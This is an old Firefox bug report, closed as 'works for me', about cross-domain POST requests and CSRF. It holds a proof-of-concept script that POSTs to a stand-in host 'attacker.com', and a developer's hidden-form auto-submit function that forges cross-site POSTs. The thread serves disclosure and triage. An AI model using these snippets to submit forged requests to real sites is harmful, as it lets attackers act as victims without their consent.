Closed Bug 573003 Opened 14 years ago Closed 14 years ago

Firefox allows cross-domain POST requests via JavaScript

Categories

(Firefox :: Security, defect)

x86_64
Windows 7
defect
Not set
normal


RESOLVED WORKSFORME

People

(Reporter: tkonrad, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3

Firefox allows the submission of arbitrary POST requests to domains different from the originating one. This makes it a lot easier to mount Cross-Site Request Forgery attacks. Imagine one of the following situations where a JavaScript, which performs a malicious action on a different site (such as posting something on Facebook), is embedded into a site:

- A malicious web site administrator embeds a malicious JavaScript into his site.
- An attacker can embed arbitrary JavaScript into a frequently visited site (such as via a Cross-Site Scripting vulnerability).

Other browsers don't allow for cross-domain POST requests (I tested IE 8, Opera 10.53 and Chrome 5).

Reproducible: Always

Steps to Reproduce:
The following script demonstrates the issue (embed it into a site different from attacker.com):

<script type="text/javascript">
	function postToUrl(url, fields)
	{
		// Fall back to XMLHttpRequest where ActiveXObject is not defined (non-IE browsers).
		var http;
		try { http = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { http = new XMLHttpRequest(); }

		// Build a form-encoded body without a dangling '&'.
		var params = [];
		for (var key in fields)
			params.push(encodeURIComponent(key) + '=' + encodeURIComponent(fields[key]));

		http.open('POST', url, true);
		http.send(params.join('&'));
	}

	var fields = {'a' : 'b'};
	postToUrl('http://attacker.com', fields);
</script>

Actual Results:
The POST request is sent.

Expected Results:
The POST request to domains different from the originating one should be denied.
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
I don't believe this is a duplicate of bug 246476; we should not be allowing cross-domain XHR without a CORS response from the host. But I'm a little confused by the example. CSRF posts would be pointing at a victim site, in which case we should be blocking it. The code points the post at "attacker.com" which presumably would implement the CORS headers, but then it's not a CSRF attack.

Of course malicious script can just create a form in the document DOM and submit it and bypass any cross-site XHR restrictions. If that's what you're talking about then this is a dupe of bug 246476, but then it should work identically in all major browsers.
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---
Indeed, the code above can be rewritten as:

function postViaForm(url, fields) {
	var form = document.createElement("form");
	form.action = url;
	form.method = "POST";
	// One hidden input per field, so the body is a normal form encoding.
	for (var key in fields) {
		var inp = document.createElement("input");
		inp.type = "hidden";
		inp.name = key;
		inp.value = fields[key];
		form.appendChild(inp);
	}
	document.body.appendChild(form);
	form.submit();
}

that will work in all browsers.

If I'm misunderstanding something, please reopen the bug. We definitely want to fix this if there really is a problem here, but I'd prefer not to have security bugs just laying around.
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → WORKSFORME